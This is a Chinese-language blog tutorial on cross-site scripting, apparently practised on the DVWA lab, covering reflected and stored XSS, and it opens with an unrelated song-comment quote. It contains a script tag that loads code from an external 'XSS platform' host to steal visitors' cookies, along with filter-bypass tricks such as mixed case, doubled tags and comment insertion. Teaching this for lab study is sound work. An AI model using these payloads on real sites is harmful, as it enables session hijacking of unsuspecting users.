扎头发,两圈太松,三圈太紧,洗澡,往左一点烫死,往右一点冻死,吃泡面,一桶吃不饱,两桶吃不完,就像我们的关系。。。
---- 网易云热评
跨站脚本攻击(XSS),恶意攻击者在web页面插入恶意script代码,当用户浏览该页面时,恶意代码就会被执行,达到攻击用户的目的。
形成原因:程序对输入和输出的过滤不严格
一、反射型XSS:需要欺骗用户自己点击链接才能出发XSS代码
1、在输入窗口输入123,点击提交,审查元素,可以看到提交的内容显示在了网页
![c4abe743b056a648c5523b2a67e2bff6.png](https://i-blog.csdnimg.cn/blog_migrate/d50d3a35b44780054983020508a62a37.jpeg)
2、在输入框输入:<script>alert('123')</script>,点击提交,弹出对话框,说明存在漏洞
![6f59b3ae5441a3bfdbce7df03bc560e1.png](https://i-blog.csdnimg.cn/blog_migrate/efe58865c4b0468d0643b148b55f5af9.png)
二、漏洞利用
1、找一个xss平台,注册账号,新建一个项目
![3c93ee33a2b4baea63302259e4b84e33.png](https://i-blog.csdnimg.cn/blog_migrate/91865711995e1c3112188f6669aea1da.png)
![613e1b6a4225b1f9ea3a47b043895f73.png](https://i-blog.csdnimg.cn/blog_migrate/8b6a0068a777fe04b99d3d3371507334.png)
2、复制关键代码:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,将该代码复制到存在漏洞的页面,然后提交
![2896b6f30fcd5a44a2be59ca3c59ff9c.png](https://i-blog.csdnimg.cn/blog_migrate/28bbf1ca1620974c7931f58e571b8229.png)
3、打开xss平台上创建的项目,我们可以得到DVWA平台登录的cookie
![607ecac9a8ecda2038c7a44d5fef4ff2.png](https://i-blog.csdnimg.cn/blog_migrate/15aa3b2ec86c044b79522d2773f99216.jpeg)
三、存储型XSS:用户只要访问存在该漏洞的页面就会触发
1、在对话框输入<script>alert('123')</script>,提交,每次刷新页面都会弹出,说明该处存在xss漏洞
![6fc18838cc5550e0902f2ea864de51bc.png](https://i-blog.csdnimg.cn/blog_migrate/2ea91276101b91db814e90b08bc66b48.png)
2、在对话框输入xss平台上生成的代码<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,点击提交,只要访问该页面的用户,都会在xss平台上看到他的cookie信息
![eef87e8ed38930e37923931364238905.png](https://i-blog.csdnimg.cn/blog_migrate/388b9d027301eeeb2d6d562c49f1af9e.png)
四、xss绕过
1、大小写绕过,将<script>修改为<ScRipt>
2、双写绕过,将<script>修改为<Sc<script>Ript>
3、注释绕过,将<script>修改为<scri<!--aaa--->pt>
4、实体转换,将&改为&,将<改为<,将>改为>等等
禁止非法,后果自负
欢迎关注公众号:web安全工具库